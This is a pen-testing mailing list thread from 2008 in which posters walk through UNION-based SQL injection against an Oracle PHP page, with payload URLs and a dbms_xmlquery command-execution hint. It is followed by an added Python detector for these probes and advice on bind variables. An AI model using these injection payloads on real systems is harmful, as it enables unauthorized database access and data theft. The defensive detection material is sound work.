Penetration Testing mailing list archives

Re: Oracle URL SQL Injection issue


From: Cesar <cesarc56 () yahoo com>
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST)

Hi

I would recommend first trying to get the source code
if possible: http://x.y.z.a/dbs.inc but I guess it
won't work; it should be a secure web server :)

Anyways, depending on the Oracle version you can easily
own it; you just need to inject a function and exploit
some known SQL injection in Oracle or, depending on
permissions, you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your favourite sql injection exploit here or any command'))

Look at:
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip


Cesar.
--- Clone <c70n3 () yahoo co in> wrote:

Thanks Jeff & everyone.

I've moved further after your emails. Really much appreciated.

With Jeff's input below I enumerated that there are 2 columns.

This time I gave


http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01790: expression must have same datatype as corresponding expression in dbs.inc on line 44

Then I tried the following:


http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr


http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

and I get the error

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an email page/forum email page.

Any idea what's next?



--- jeffrey rivero <jeffr76 () yahoo com> wrote:

Hello all,
in your Union start by finding out how many columns there are,
i.e.

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4.
Then once you have that, get the data types:

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string, and so on.
Then you can start to get real data from the tables, or

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--

Jeff

Clone wrote:
Hey List

I am pen testing a web app that supplies SQL parameters on the URL, something like

http://x.y.z.a/item.php?Id=90

I did blind SQL injection by adding AND 1=1 to confirm the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90'

I get

ociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in item.php on line 312

Then I tried (after confirming presence of usr table name)

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--

and I get the error

ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44

I know one valid user account in the Oracle DB.

Any idea what's the best strategy to move forward?

I'm not getting any further from here so far.

Any advice / help would be much appreciated.

Cheers
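Seen from the defending side, Jeff's column-count and datatype walk and the ORA errors Clone pasted above leave a recognisable trail in the logs; this added Python detector (not from any poster, run over constructed sample lines in a hypothetical combined request/DB-error log format) flags clients that produce it:

```python
import re
from collections import Counter
from urllib.parse import unquote

# Errors quoted in this thread that surface while a UNION injection is being probed:
# ORA-01756 (broken quoted string), ORA-01789 (wrong column count),
# ORA-01790 (datatype mismatch), ORA-00911 (invalid character).
PROBE_ERRORS = {"ORA-01756", "ORA-01789", "ORA-01790", "ORA-00911"}

# Constructed (hypothetical) application-log format: [time] client GET url status [db error]
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] (?P<ip>\S+) GET (?P<url>\S+) (?P<status>\d{3})(?: (?P<msg>.*))?$")
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)
ORA_RE = re.compile(r"\b(ORA-\d{5})\b")

# Constructed sample lines mirroring the requests and errors reported in the thread.
SAMPLE_LOG = """\
[23/Jan/2008:15:01:02] 203.0.113.5 GET /item.php?Id=90 200
[23/Jan/2008:15:01:09] 203.0.113.5 GET /item.php?Id=90%27 500 ociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in item.php on line 312
[23/Jan/2008:15:02:10] 203.0.113.5 GET /item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;-- 500 ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44
[23/Jan/2008:15:03:11] 203.0.113.5 GET /item.php?Id=90%20union%20select%201,1%20from%20usr 500 ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01790: expression must have same datatype as corresponding expression in dbs.inc on line 44
[23/Jan/2008:15:04:12] 203.0.113.5 GET /item.php?Id=91 200
[23/Jan/2008:15:05:13] 198.51.100.7 GET /item.php?Id=42 200
"""

def classify(line):
    """Parse one line: client, whether the decoded URL carries UNION SELECT, ORA code raised."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = unquote(m.group("url"))  # %20UNION%20SELECT -> ' UNION SELECT'
    ora = ORA_RE.search(m.group("msg") or "")
    return {"ip": m.group("ip"), "union": bool(UNION_RE.search(url)),
            "ora": ora.group(1) if ora else None}

def find_probing(log, min_events=2):
    """Count UNION requests and probe-class ORA errors per client; return clients over
    the threshold. ORA-01789 then ORA-01790 is the column-count-then-datatype walk above."""
    per_ip = {}
    for line in log.splitlines():
        ev = classify(line)
        if ev is None:
            continue
        hits = per_ip.setdefault(ev["ip"], Counter())
        if ev["union"]:
            hits["union_select"] += 1
        if ev["ora"] in PROBE_ERRORS:
            hits[ev["ora"]] += 1
    return {ip: dict(c) for ip, c in per_ip.items() if sum(c.values()) >= min_events}
```

The application-side fix is to bind the Id value with oci_bind_by_name instead of concatenating it into the statement in item.php, and to stop returning raw ORA-* messages to the browser.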


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution
FREE today!

http://www.cenzic.com/downloads
